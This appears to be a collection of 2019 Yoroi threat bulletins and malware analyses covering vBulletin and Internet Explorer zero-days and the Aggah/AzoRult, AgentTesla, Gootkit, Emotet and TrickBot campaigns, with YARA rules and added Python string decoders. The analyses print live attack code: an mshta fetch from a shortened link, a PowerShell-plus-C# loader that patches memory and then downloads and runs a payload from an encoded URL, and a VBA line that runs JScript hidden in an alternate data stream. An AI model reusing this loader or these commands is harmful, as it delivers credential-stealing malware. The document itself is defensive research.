Warning: 0-day Vulnerability in vBulletin

Proto: N070919.

Yoroi would like to inform you about the recent discovery of a 0-day vulnerability in vBulletin, one of the leading technologies for building specialist forums and online communities. The issue is tracked as CVE-2019-16759.

In recent days a working exploit was publicly released that allows arbitrary code execution on the target server, due to serious flaws in the handling of Ajax requests in the “widget_php” module. The flaw can be exploited by remote, unauthenticated attackers to gain unauthorized access to systems, automatically propagate worms and malware within them, and steal their contents, including user accounts and credentials.

The vendor has confirmed the issue and released security patches for vBulletin versions 5.5.2, 5.5.3 and 5.5.4. Yoroi therefore recommends applying these updates to any vBulletin instances in use within your organizations. Yoroi also recommends evaluating the adoption of a policy on the use of corporate email addresses on forums and communities, in order to limit their exposure in the event of a third-party data breach.

Finally, Yoroi recommends keeping user awareness high by periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

0-day Vulnerability in Internet Explorer

Proto: N060919.

Yoroi would like to inform you about the recent release of important security updates fixing a 0-day vulnerability in the Internet Explorer browser. The issue is tracked as CVE-2019-1367.

Due to memory handling flaws in the scripting engine of Microsoft's long-standing browser, a network attacker may be able to execute arbitrary code on the victim machine simply by having the user browse malicious or compromised websites. This represents a risk scenario because it can be exploited in Watering-Hole attack schemes during targeted attack campaigns, or through Exploit Kits.

The vendor has confirmed the issue in a dedicated bulletin, releasing security patches outside the normal update cycle for the following versions:

Although no public exploits or large-scale attacks are known yet, GTAG researchers have confirmed exploitation of the vulnerability in potentially targeted 0-day attack activity. Yoroi therefore recommends planning the deployment of the updates made available by the vendor or, alternatively, evaluating the access restrictions on the JScript.dll scripting engine suggested by the vendor.

Finally, Yoroi recommends keeping user awareness high by periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

APT or not APT? What's Behind the Aggah Campaign

Introduction

During our threat monitoring activities, we discovered an interesting drop chain related to the well-known Aggah campaign, the ambiguous infection chain observed by Unit42 which seemed to deliver payloads potentially associated with the Gorgon Group APT. After that, we discovered other malicious activities using the same TTPs and infrastructure, documented for instance in the “The Enigmatic “Roma225” Campaign” and “The Evolution of Aggah: From Roma225 to the RG Campaign” reports.

But, despite the very similar infection chain, these latest attacks revealed a curious variation of the final payload, opening up different interpretations and hypotheses about the “Aggah” activities.

Technical Analysis

Hash: 7f649548b24721e1a0cff2dafb7269741ff18b94274ac827ba86e6a696e9de87
Threat: Excel document Dropper
Brief Description: First stage of Aggah campaign
Ssdeep: 768:4Sk3hOdsylKlgxopeiBNhZFGzE+cL2kdAJrqYtAd/fBuzPRtUb:hk3hOdsylKlgxopeiBNhZFGzE+cL2kd3

Table 1. Sample’s information

As in most infections, the multi-stage chain starts with a weaponized Office document containing VBA macro code. The code is clearly obfuscated; after a de-obfuscation phase, we discovered it invokes the following OS command:

mshta.exe http://bit[.ly/8hsshjahassahsh

The bit.ly link redirects to the attacker’s page hosted on Blogspot at hxxps://myownteammana.blogspot[.com/p/otuego4thday.html. This is the typical Aggah modus operandi. In fact, the webpage source code contains a JavaScript snippet designed to be executed by the MSHTA engine.

Figure 1. HTA script hidden into Blogspot page

Figure 2. Deobfuscated HTA script

This script is obfuscated using a combination of URL-encoding and string reversing. Once again, the script is only a dropper that downloads the next malicious stage hosted on PasteBin. Like in the previous Aggah campaigns, the pastes were created by the “hagga” account. This stage is designed to kill the Office suite processes and to create a new registry key to achieve persistence on the target system. This way the hagga dropper would survive a reboot.

Figure 3. Another obfuscated Javascript snippet

In detail, the malware uses three mechanisms to ensure its persistence on the victim machine:

Each entry contacts pastebin.com to download and execute a further payload. The interesting fact is that the URLs referenced by the tasks and by the registry key differ from each other, so the attacker is able to deliver more than one payload by just changing one of the pastes.

Figure 4. Code used to set persistence

During the analysis, all three URLs pointed to the same script, which is reported in the following screenshot. The cleaned code reveals a byte array composing PowerShell commands, which download two other snippets from Pastebin.

Figure 5. Deobfuscation process

Figure 6. Powershell script used to inject the final payload in legit process

The first one corresponds to the “Hackitup” DLL file, already discussed in our previous report. The second paste is the final payload. In many other Aggah campaigns it corresponds to RevengeRAT, which could also be linked to the Gorgon Group. However, during this analysis we identified another kind of final stage.

The AzoRult Payload

Hash: 37086a162bebaecba466b3706acea19578d99afd2adf1492a074536aa7c742c1
Threat: AzoRult
Brief Description: AzoRult final payload
Ssdeep: 3072:tuOSXpMx7ZAlHsbfUkolNGti7lfqeSxM3SpyEY3E/qxg/:Zzx7ZApszolIo7lf/ipT/q

Table 3. Sample’s information

This time, the final payload was a variant of a popular infostealer for sale on the dark markets, AzoRult. It is able to access the saved credentials of major browsers such as Chromium, Firefox, Opera and Vivaldi, exfiltrating cookies, credentials and other browsing data.

Figure 7. AzoRult tries to extract info from browsers files

Having a deeper look at the command and control infrastructure, we noticed some interesting details. In fact, we discovered a particular customized fork of AzoRult 3.2 called “Mana Tools”. At the same time, reviewing the infection chain data revealed a reference to this “Mana” customization even in the Blogspot page abused in the first steps of the chain.

Figure 8. Blogspot page (on the left); “Mana” logo related to AzoRult C2

Conclusion

We monitored the campaign and its final payload for several days, finding that the attacker delivered AzoRult samples only a few times, during the first days of September 2019, after which it resumed delivering RevengeRAT samples.

The “Mana” campaign opens up a series of hypotheses about the threat actor behind it. According to Palo Alto Networks, the “Aggah” infection chain could have been used by Gorgon Group too, but with a different payload. So, it is possible that Gorgon added this particular AzoRult version to its arsenal, maybe to retrieve initial information about its victims or to increase its recon capabilities. But the confidence in this scenario is not high enough to confirm it. Another possibility is that another minor cyber criminal leveraged the Aggah infection chain to deliver his own AzoRult payload, which is a commodity malware, or that the actors behind the “Hagga” Pastebin account used their own infection chain to conduct their own attack campaign. Many questions that only further hunting could answer.

Indicators of Compromise

Yara Rules

import "pe"

rule Mana_Aggah_campaign_excel_dropper_Sep_2019 {
    meta:
        description = "Yara Rule for Mana campaign Excel dropper"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-18"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {64 68 61 73 6A 00 6B 68 64 61 6B 6A 73 68 00 64 6B 61 28 29}
        $a2 = {61 70 74 77 4D 71 55 45 27}
    condition:
        all of them
}

rule Mana_Aggah_campaign_injector_Sep_2019 {
    meta:
        description = "Yara Rule for Mana campaign DLL injector"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-18"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {4D 5A}
        $a2 = {93 E5 21 3F 59 AE}
        $a3 = {11 08 28 22}
        $a4 = "v2.0.507"
        $a5 = {E2 80 8C E2 80}
        $a6 = {81 AC E2 81 AF E2 80 AE}
        $a7 = {E2 81 AA E2 80}
        $a8 = {81 AF E2 80 AA}
        $a9 = {81 AC E2 81 AF E2 80 AE}
        $a10 = {C5 C7 4C 9E 65 A5 B6 42}
    condition:
        6 of ($a*)
}

rule Mana_Aggah_campaign_AzoRult_Sep_2019 {
    meta:
        description = "Yara Rule for Mana campaign AzoRult sample"
        author = "Cybaze Zlab_Yoroi"
        last_updated = "2019-09-18"
        tlp = "white"
        category = "informational"
    strings:
        $h1 = {4D 5A 50}
        $bob1 = {55 8B EC 83 C4 F0 B8 ?? ?? ?? ?? E8}
        $bob2 = {55 8B EC 83 C4 F0 53 56 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8}
        $bob3 = {55 8B EC 83 C4 F0 53 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B8 ?? ?? ?? ?? E8}
        $s1 = "SOFTWARE\\Borland\\Delphi\\RTL" ascii wide
        $s2 = "moz_historyvisits.visit_date" ascii wide
        $s3 = "\\BitcoinCore_custom\\wallet.dat" ascii wide
    condition:
        $h1 and all of ($s*) and 1 of ($bob*)
}

This blog post was authored by Antonio Farina and Luca Mella of Cybaze-Yoroi Z-LAB

Commodity Malware Reborn: The AgentTesla “Total Oil” themed Campaign

Introduction

Nowadays Malware-as-a-Service is one of the criminals’ favorite ways to breach security perimeters. Agent Tesla is one of these “commodity malware” families: a fully customizable password info-stealer that many cyber criminals are choosing as their preferred reconnaissance tool.

During our monitoring operations we discovered an infection chain designed to deliver this kind of malware to some Italian companies. The attack was carried out impersonating personnel from the Liberian division of a global oil corporation. The malicious email messages were spoofed, but the reference to the employee was realistic, suggesting the attacker may have conducted some preliminary OSINT.

Technical Analysis

Hash: 72087f6eda897bd3deb31fa85cfbeda8eae4bad0d51a123f3e99ae8fb604a8c0
Threat: Macro Dropper
Brief Description: Agent Tesla Doc Macro Dropper
Ssdeep: 768:nI5p+fXDk6n/lj9uJUWbnyAik8Y61g187083VCP9V9eakw6L8:8p+fzP/bgfix28ly9VZH6L8

Table 1. Static information about the doc macro

The document uses a common phishing scheme: it invites the user to enable macro execution, claiming compatibility reasons with older Microsoft Office versions. The document contains an obfuscated VBA macro.

Figure 1: Screen of the fake document

Figure 2: Piece of the malicious macro

Despite the variable names and the altered code flow, the macro simply decodes its hidden payload and then executes it. In fact, after a series of text replacements the document spawns the following PowerShell script.

powershell -WindowStyle Hidden
# XOR decoder: every hex byte pair is XORed with the repeating key 'bc9b4'
function b72f3 {
    param($l74b5)
    $l557ad = 'bc9b4'; $l63acc = '';
    for ($i = 0; $i -lt $l74b5.length; $i += 2) {
        $f3ed5fa = [convert]::ToByte($l74b5.Substring($i, 2), 16);
        $l63acc += [char]($f3ed5fa -bxor $l557ad[($i / 2) % $l557ad.length]);
    }
    return $l63acc;
}
# Encoded C# source, decoded, compiled in-process and invoked
$k61b35e = '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'; $k61b35e2 = b72f3($k61b35e);
Add-Type -TypeDefinition $k61b35e2; [p99a3fb]::o81f67();

Code Snippet 1

The PowerShell stage is essentially composed of three parts: the first is the declaration of the “b72f3()” function, whose purpose is to deobfuscate the second part of the script, contained in the “$k61b35e” variable. This is actually a C# source code snippet, compiled and loaded within the PowerShell process at execution time. Once loaded, the third part of the script invokes the “o81f67()” method of the just-compiled “p99a3fb” class.

using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.IO;
using System.Net;

public class p99a3fb {
    // Win32 imports under randomized names: GetProcAddress, LoadLibrary,
    // VirtualProtect and RtlMoveMemory.
    [DllImport("kernel32", EntryPoint = "GetProcAddress")]
    public static extern IntPtr va46a7(IntPtr af474b5, string a2457);
    [DllImport("kernel32", EntryPoint = "LoadLibrary")]
    public static extern IntPtr ud1451(string j4d4b5);
    [DllImport("kernel32", EntryPoint = "VirtualProtect")]
    public static extern bool m9982c8(IntPtr sfff854, UIntPtr j5236a, uint r427a, out uint m8a94);
    [DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
    static extern void jcfb22(IntPtr mf1b8, IntPtr dcad15, int k456b);

    public static int o81f67() {
        // Resolve a library and one of its exports by XOR-encoded name, then
        // overwrite three bytes at offset 0x1b of that export in memory.
        IntPtr eef257 = ud1451(b72f3("030e4a0b1a060f55"));
        if (eef257 == IntPtr.Zero) { goto l255c; }
        IntPtr bca6aa = va46a7(eef257, b72f3("230e4a0b67010257204104055c10"));
        if (bca6aa == IntPtr.Zero) { goto l255c; }
        UIntPtr de6f3 = (UIntPtr)5;
        uint d5c61 = 0;
        // 0x40 = PAGE_EXECUTE_READWRITE
        if (!m9982c8(bca6aa, de6f3, 0x40, out d5c61)) { goto l255c; }
        Byte[] e197fb8 = { 0x31, 0xff, 0x90 };
        IntPtr kee39a = Marshal.AllocHGlobal(3);
        Marshal.Copy(e197fb8, 0, kee39a, 3);
        jcfb22(new IntPtr(bca6aa.ToInt64() + 0x001b), kee39a, 3);
    l255c:
        // Drop stage: download the decoded URL into %APPDATA% and execute it.
        WebClient rd1389 = new WebClient();
        string ybea79 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\x3a81a" + b72f3("4c064107");
        rd1389.DownloadFile(b72f3("0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b120f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07"), ybea79);
        ProcessStartInfo n52cefe = new ProcessStartInfo(ybea79);
        Process.Start(n52cefe);
        return 0;
    }

    // Same XOR decoder as the PowerShell stage: hex byte pairs XORed with "bc9b4".
    public static string b72f3(string s1f74a) {
        string af474b5 = "bc9b4";
        string ud1451 = String.Empty;
        for (int i = 0; i < s1f74a.Length; i += 2) {
            byte va46a7 = Convert.ToByte(s1f74a.Substring(i, 2), 16);
            ud1451 += (char)(va46a7 ^ af474b5[(i / 2) % af474b5.Length]);
        }
        return ud1451;
    }
}

Code snippet 2

Code Snippet 2 is the C# class to be loaded. Its objective is to download the payload from the drop URL, previously decoded by the “b72f3()” function: “hxxp://www.handrush[.com/wp-content/plugins/akismet/views/DurGhamPop[.exe”

The payload is stored in the “%APPDATA%\Roaming” path and immediately executed through the “Process.Start()” function.
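The string decoder shared by Code Snippet 1 and Code Snippet 2, re-implemented in Python as an added example (not the article's or the malware's code) so the four hex literals in the C# class can be recovered offline; the literal labels and the defang/key-recovery helpers are ours, and the constructed "http://" known-plaintext assumption is used only to show how the key can be derived when a variant changes it.

```python
"""XOR-with-repeating-key decoder matching the loader's b72f3() routine.

Added example, not code from the original article: it re-implements the
malware's string decoder so the hex literals embedded in the C# class can be
recovered and defanged for reporting and detection engineering.
"""
from __future__ import annotations

KEY = b"bc9b4"  # repeating XOR key hard-coded in both the PowerShell and C# stages

# The four hex literals passed to b72f3() in Code Snippet 2, copied from the article.
# The labels are ours and name the call site, not anything the malware declares.
LITERALS = {
    "LoadLibrary argument": "030e4a0b1a060f55",
    "GetProcAddress argument": "230e4a0b67010257204104055c10",
    "dropped file extension": "4c064107",
    "drop URL": "0a174d120e4d4c4e15434c0b580c5010164a0a1a010c544d43124e5a0d5a160657161b12"
                "0f4c055d0c1016035f0b105407404d15500743114c7d1746250b580f640d1317074c07",
}


def b72f3(hex_blob: str, key: bytes = KEY) -> str:
    """Decode a hex literal exactly as the loader's b72f3() does.

    The C# code indexes the key with (i / 2) % len(key) over the hex offset i,
    which is simply byte_index % len(key) once pairs are converted to bytes.
    """
    if len(hex_blob) % 2:
        raise ValueError("hex literal has odd length")
    data = bytes.fromhex(hex_blob)
    return "".join(chr(b ^ key[i % len(key)]) for i, b in enumerate(data))


def defang(text: str) -> str:
    """Make a decoded URL safe to paste into a report: http -> hxxp, '.' -> '[.]'."""
    return text.replace("http", "hxxp", 1).replace(".", "[.]")


def decode_all(literals: dict[str, str] = LITERALS) -> dict[str, str]:
    """Decode every literal; anything that looks like a URL is defanged."""
    out = {}
    for name, blob in literals.items():
        plain = b72f3(blob)
        out[name] = defang(plain) if plain.startswith("http") else plain
    return out


def recover_key(hex_blob: str, known_prefix: str, key_len: int) -> bytes:
    """Recover a repeating XOR key from a known plaintext prefix.

    Useful when a variant changes the key: the drop URL literal must start
    with "http://", which is longer than the 5-byte key, so the key falls out
    of ciphertext XOR plaintext without reading the decoder at all.
    """
    if len(known_prefix) < key_len:
        raise ValueError("known prefix must cover at least one key period")
    data = bytes.fromhex(hex_blob)
    return bytes(data[i] ^ ord(known_prefix[i]) for i in range(key_len))


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:>24}: {value}")
    print("recovered key:", recover_key(LITERALS["drop URL"], "http://", 5))
```

Decoding the first two literals names the library export whose bytes the loader overwrites at offset 0x1b before downloading anything; that in-memory patch, not only the download, is the behaviour worth alerting on.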

The Loader

Hash: 51a95607ab767b8b70479bdb86cc0a20b53eda92cd11f3abbe9eda5616a50a97
Threat: Agent Tesla Loader
Brief Description: Agent Tesla .NET C# loader
Ssdeep: 12288:8OQeYYBAkiEK/jfG3JI0YXvL7VIUMbHdX9WBRktIx4urElCccP:8cYCdiEK/jGXqLhqNQAICurrccP

Table 2. Static information about the AgentTesla evasive loader

The dropped payload is a .NET executable embedding some anti-analysis tricks. If it is executed in a virtual environment, the malware kills itself. It also uses some anti-debugging tricks to decide whether to terminate its execution.

Figure 3: Method after which the process kills itself

According to the MSDN documentation, the method Delegate.CreateDelegate "creates a delegate of the specified type that represents the specified static method of the specified class, with the specified case-sensitivity and the specified behavior on failure to bind". This way, the control flow is switched to the delegated method which actually points to a DLL containing the anti-analysis logic.

Figure 4: Loading routine of the internal DLL

Before passing control to the “swety.dll” library, a helper component whose only purpose is the identification of analysis environments, the first instructions executed here decode and load a byte array embedded inside the executable, unpacking the obfuscated code.

Figure 5: Decoding routine of the DLL

The figure above shows how this payload is encoded within the byte array and the routine invoked to retrieve it. This byte array is actually a well-formed DLL loaded through the “Thread.GetDomain().Load()” method. At this point, control finally passes to the "swety.dll" library, the module in charge of detecting the analysis environment.

The “Swety” Module

Hash: a0c9472bc1660be648adce938d5447d38ba6d6f166d18d9e9b4ec4dd74c315c0
Threat: Swety evasion module
Brief Description: .NET Swety evasion module
Ssdeep: 1536:fKTxXyAZ0ngmxSHOKQZfRWC/BiwGJ/827Lwv9kAdhUkIahRm48GSL/bq0g+9R26:fKpXGxxdZfE37+9pdhjTm2k/bmQ26

Table 3. Static information about the “swety” evasive module

This component is also a .NET executable. The class names are self-explanatory: for instance, there are clear references to Virtual Machine detection logic.

Figure 6: Example of the enumeration of the Hypervisors

In Figure 9, the malware retrieves information about the current hardware and compares it with a defined set of criteria; when it finds a match, it kills itself. Otherwise, the DLL continues its execution and loads another PE file hidden inside the initial loader. This last executable runs as a new thread within the initial loader’s context.

Figure 7: Loading of the AgentTesla final payload

The Payload 

Hash: 82213cd55fee5374e407b4b98c45d7b0d291682ec0fd91b3ea47c32752b54ab9
Threat: Agent Tesla
Brief Description: Agent Tesla Payload
Ssdeep: 6144:Ci+WZ3skyQgBYnQ7oEFjaRJ8d8ZxjD1N/a66Gq3ovDuItbP7:CbGyH5ZjaRedapNT6

Table 4. Static information about the AgentTesla payload

The extracted payload is a .NET binary. AgentTesla and Hawkeye share many pieces of code, and the analysis we published two months ago about the Hawkeye payload largely applies to this one.

Figure 8: Recurrent string decryption routine through the usage of Rijndael algorithm

Also in this case every sensitive string and piece of information is encrypted with the Rijndael algorithm, and the malware tries to evade sandboxes by checking for the common user names of the main sandboxes. The persistence mechanism is practically the same, and the installation path detected during the analysis is “%APPDATA%/Roaming/SecondLORI/SecondLORI.exe”.

Figure 9: Sandbox evasion trick

Figure 10: Persistence mechanism

After its installation, the malware starts to retrieve all the credentials stored within a wide list of web browsers, FTP clients, file downloaders, etc. For instance, it is able to steal accounts from:

The harvested credentials are then sent back to the attacker servers. The malware leverages the .NET API to easily set up a mail client to transmit the loot to a particular mailbox.

Figure 11: SMTP client account configuration

The name of the sender, “Lori”, matches the name in the persistence mechanism, “SecondLORI”. This username may belong to a previously compromised email account the attacker uses as a sort of SMTP relay to deliver the loot to the real exfiltration address, a GMail mailbox named “[email protected]”. 

Figure 12: SMTP communication

Conclusion

As we stated in the previous post about a custom weaponization of the Hawkeye info-stealer, these kinds of malware are well known and widely used by cyber criminals. But despite their popularity, even within the info-sec community, these "commodity tools" still prove quite effective, especially when combined within custom multistage infection chains, renewing their dangerousness and effectiveness.

Indicators of Compromise

Hashes

DropUrl:

C2 (smtp)

Persistence Mechanism

Yara Rules

import "pe"

rule AgentTesla_MacroDropper_1909 {
    meta:
        description = "Yara rule for AgentTesla Macro DOC Dropper 1909"
        author = "Yoroi - ZLab"
        last_updated = "2019-09-17"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {70 6D EF 0D 0F 32 2A A4 A0 8D 0A}
        $a2 = {7B D6 CB 41 C7 28 48 4D ED A5}
        $a3 = {5F AF B6 16 6C A9 3A 0C 5F D8 5C}
    condition:
        uint16(0) == 0x4B50 and all of them
}

rule AgentTesla_loader_1909 {
    meta:
        description = "Yara rule for AgentTesla loader 1909"
        author = "Yoroi - ZLab"
        last_updated = "2019-09-17"
        tlp = "white"
        category = "informational"
    strings:
        $a1 = {3D D2 5B 5B 7B 9B EF 4C BB}
        $a2 = {8E AF 2D D0 BD 78 5C D1 15}
        $a3 = "F7yYSv5wCAK/4YCGT+bQ==" ascii wide
    condition:
        uint16(0) == 0x5A4D and pe.timestamp == 0x25E8088E and all of them
}

This article was authored by Luigi Martire and Luca Mella of Cybaze-Yoroi Z-LAB.

New Gootkit Attack Operations

Proto: N050919.

Yoroi would like to inform you about the detection of a new attack campaign targeting Italian companies and users. The attacks aim to compromise the targeted users with malware implants of the Gootkit family (TH-106). The threat is able to give attackers remote access and to intercept and alter user browsing traffic towards some of the main Italian and French banking portals. References to groups such as Unicredit, In-Bank, Cedacri, Intesa Sanpaolo, Groupe Banque Populaire, Poste Italiane, Crédit Agricole, CariParma, Crédit Coopératif, BNP Paribas, Caisse D'Epargne, Banco BPM and Raiffeisen were in fact found within the malware configurations.

The indicators of compromise collected during the analysis are reported below:

Finally, Yoroi recommends keeping user awareness high by periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

Return of the Emotet Attack Campaigns

Proto: N040919.

Yoroi would like to inform you about the detection of new attack activity linked to the Emotet threat (TH-168). The attacks of this botnet have resumed after a pause of about two months. New malicious email messages are currently circulating, directed at organizations and users all over the world, containing Office documents able to download and install variants of the Emotet malware on the victim machines. The threat is able to steal passwords and user keystrokes, intercept and alter browsing traffic, and give cyber criminals remote access to the compromised networks.

Figure. Example of a malicious document

The indicators of compromise collected during the analysis are reported below:

Finally, Yoroi recommends keeping user awareness high by periodically warning users about ongoing threats, and relying on a team of experts to safeguard the security of the "cyber" perimeter. For a real-time threat index, please visit the following link: Yoroi Cyber Security Index

Dissecting the 10k Lines of the new TrickBot Dropper

Introduction

TrickBot is one of the best known Banking Trojans: it has been infecting victims since 2016 and is considered a cyber-crime tool. But nowadays defining it a “Banking Trojan” is quite reductive: during the last years its modularity brought the malware to a higher level. In fact, it can be considered a sort of malicious implant able not only to commit bank-related crimes, but also to provide tools and mechanisms for advanced attackers to penetrate company networks. For instance, it has been used by several gangs to inoculate Ryuk ransomware within the core server infrastructure, leading to severe outages and business interruption (e.g. the Bonfiglioli case).

In this report, we analyzed one of the recently weaponized Word documents spread by TrickBot operators all around the globe, revealing an interesting dropper composed of several thousand highly obfuscated lines of code and abusing the so-called ADS (Alternate Data Stream).

Technical Analysis

Hash: 07ba828eb42cfd83ea3667a5eac8f04b6d88c66e6473bcf1dba3c8bb13ad17d6
Threat: Dropper
Brief Description: TrickBot document dropper
Ssdeep: 1536:KakJo2opCGqSW6zY2HRH2bUoHH4OcAPHy7ls4Zk+Q7PhLQOmB:3oo2hNx2Z2b9nJcAa7lsmg5LQOmB

Table 1. Sample’s information

Once opened, the analyzed Word document reveals its nature through an initial, trivial trick. The attacker simply used a white font to hide the malicious content from the unaware user (and from the endpoint agents). Just changing the font foreground color unveils some dense JavaScript code. This code will be executed in the next stages of the infection chain, but before digging into the JavaScript code, we’ll explore the macro code embedded into the malicious document.

Figure 1. Content of Word document

Figure 2. Unveiled content of Word document

The “Document_Open()” function (Figure 3) is automatically executed after the opening of the Word document. It retrieves the hidden document content through the “Print #StarOk, ActiveDocument.Content.Text” statement and writes a copy of it into the “%AppData%\Microsoft\Word\STARTUP\stati_stic.inf:com1” local file.

Figure 3. Macro code embedded in the malicious document

Exploring the “\Word\STARTUP” folder we noticed the “stati_stic.inf” file is zero bytes long. Actually, the dropper abused an old Windows file system feature, known as “Alternate Data Stream” (ADS), to hide its functional data in an unconventional stream. This known technique, T1096 in the MITRE ATT&CK framework, can be used simply by appending the colon operator and the stream name to the filename during any write or read operation. So, we extracted the content of the stream through a simple PowerShell command.

Figure 4. Use of Alternate Data Stream to hide the payload

The extracted payload is the initial Word document hidden content. The malicious control flow resumes with the “Document_Close()” function, in which the “StripAllHidden()” function is invoked. This routine deletes all the hidden information embedded into the document by the attacker, probably with the intent to hide any traces unintentionally embedded during the development phase. Its code has probably been borrowed from some public snippets such as the one included at the link

After that, the macro code executes the data just written into the “com1” data stream. Since the stream contains JavaScript code, it is executed through the WScript utility using the following instruction:

CallByName CreateObject("wS" & Chri & "Ript.She" & Ja), "Run", VbMethod, Right(Right("WhiteGunPower", 8), Rule) & "sHe" & Ja & " wS" & Chri & "RipT" & GroundOn, 0

Which, after a little cleanup, becomes:

CallByName CreateObject("wScript.Shell"), "Run", VbMethod, "powershell wscript /e:jscript ""c:\users\admin\appdata\roaming\microsoft\word\startup\stati_stic.inf:com1""", 0

The JavaScript Dropper

Now, let’s take a look at the JavaScript code. It is heavily obfuscated and uses randomization techniques to rename variables and some comments, along with chunks of junk instructions, resulting in a potentially low detection rate.

Figure 5. Example of the sample detection rate

At first glance, the attacker’s purpose seems fulfilled. The script is not easily readable and appears extremely complex: almost 10 thousand lines of code and over 1800 anonymous functions declared in the code.

Figure 6. Content of the JavaScript file

But after a deeper look, two key functions, named “jnabron00” and “jnabron”, emerge. These functions are used to obfuscate every comprehensible character of the script. The first one, “jnabron00”, is illustrated in the following figure: it always returns zero.

Figure 7. Function used to obfuscate the code

The other one, “jnabron”, is invoked with two parameters: an integer value (derived from some obfuscated operations) and a string which is always “Ch”.

jnabron(102, 'Ch')

The purpose of this function is now easy to understand: it returns the ASCII character associated with the integer value through the “String.fromCharCode” JS function. Obviously, once again, to obfuscate the function internals the attacker included many junk instructions, as reported in Figure 9.

Figure 8. Another function used to obfuscate the code

Using a combination of the two functions, the script unpacks its real instructions, making the work of the analyst who has to understand the malicious intent of the script tedious. As shown in the following figure, tens of code lines result in a single instruction containing the real value that will be included in the final script.

Figure 9. Example of de-obfuscation process
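A Python de-obfuscator for the two helper functions described above, added here as an example (not the article's code or the attacker's script): it folds “jnabron00(...)” to 0 and “jnabron(n, 'Ch')” to the character with code n, then merges the resulting string concatenations. The input is a constructed snippet in the same style, and the code assumes the first argument of “jnabron()” is flat arithmetic over literals and “jnabron00()” calls.

```python
"""De-obfuscator for the TrickBot dropper's jnabron00()/jnabron() helpers.

Added example, not the article's code: jnabron00(...) always returns 0 and
jnabron(n, 'Ch') returns String.fromCharCode(n), so the script can be folded
back into plain string literals with three text passes. Assumption: the first
argument of jnabron() is flat integer arithmetic over literals and jnabron00().
"""
from __future__ import annotations

import ast
import operator
import re

# Constructed sample in the style of the dropper, NOT copied from the real script.
SAMPLE_JS = (
    "var a1 = jnabron(104, 'Ch') + jnabron(0x74 + jnabron00(9), 'Ch') + "
    "jnabron(232/2, 'Ch') + jnabron(jnabron00(1)+112, 'Ch') + jnabron(58, 'Ch');\n"
    "var a2 = a1 + jnabron(47, 'Ch') + jnabron(47, 'Ch');\n"
)

JNABRON00 = re.compile(r"jnabron00\s*\([^()]*\)")
# Same shape the article's YARA string $b1 keys on: "(<anything>,'Ch')".
JNABRON = re.compile(r"jnabron\s*\(\s*([^()'\"]+?)\s*,\s*'Ch'\s*\)")
CONCAT = re.compile(r"'((?:[^'\\]|\\.)*)'\s*\+\s*'((?:[^'\\]|\\.)*)'")

_OPS = {
    ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul,
    ast.Div: operator.truediv, ast.FloorDiv: operator.floordiv, ast.Mod: operator.mod,
}


def safe_int(expr: str) -> int:
    """Evaluate flat arithmetic without eval(); names, calls etc. are rejected."""
    def ev(node: ast.AST):
        if isinstance(node, ast.Expression):
            return ev(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _OPS:
            return _OPS[type(node.op)](ev(node.left), ev(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -ev(node.operand)
        raise ValueError(f"unsupported expression: {expr!r}")
    return int(ev(ast.parse(expr.strip(), mode="eval")))


def deobfuscate(js: str) -> str:
    """Fold jnabron00()/jnabron() calls into plain string literals."""
    # Pass 1: jnabron00(...) is a constant 0 whatever it is given.
    prev = None
    while prev != js:
        prev, js = js, JNABRON00.sub("0", js)

    # Pass 2: jnabron(<expr>, 'Ch') is the character with that code.
    def to_literal(m: re.Match) -> str:
        ch = chr(safe_int(m.group(1)))
        return "'" + ch.replace("\\", "\\\\").replace("'", "\\'") + "'"
    js = JNABRON.sub(to_literal, js)

    # Pass 3: merge adjacent literal concatenations until nothing changes.
    prev = None
    while prev != js:
        prev, js = js, CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", js)
    return js


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS))
```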

After a de-obfuscation phase, some useful values are visible, such as the C2 address, the execution of a POST request, and the presence of Base64-encoded data.

Figure 10. C2 checkin code

Analyzing this hidden control flow we discover that the first action performed is the gathering of particular system information. This is done through the WMI interface, specifying a particular WQL query and invoking the “ExecQuery” function to retrieve:

Figure 11. Code used to extract information about system

This information is then sent to the command and control server during the check-in phase of the JavaScript loader, along with the list of running processes.

Figure 12. Network traffic

Moreover, the script is able to gather a list of all files having one of the extensions chosen by the attacker: PDF files and Office, Word and Excel documents. The result of this search is then written to a local file in the “%TEMP%” folder, and later uploaded to the attacker infrastructure.

Figure 13. Code to extract absolute paths from specific file types

Conclusion

TrickBot is one of the most active Banking Trojans today; it is considered part of the cyber crime arsenal and it is still under development. The malware, which first appeared in 2016, has added functionalities and exploit capabilities over the last years, such as the exploits for the infamous SMB vulnerability (MS17-010): EternalBlue, EternalRomance and EternalChampion.

The analyzed dropper contains highly obfuscated JavaScript code counting about 10 thousand lines of code. This new infection chain structure represents an increased threat to companies and users: it can achieve low detection rates, enabling the unnoticed delivery of the TrickBot payload, which can be really dangerous for its victims. Just a few days, or even a few hours in some cases, of active infection could be enough to propagate advanced ransomware attacks all across the company IT infrastructure.

Indicators of Compromise

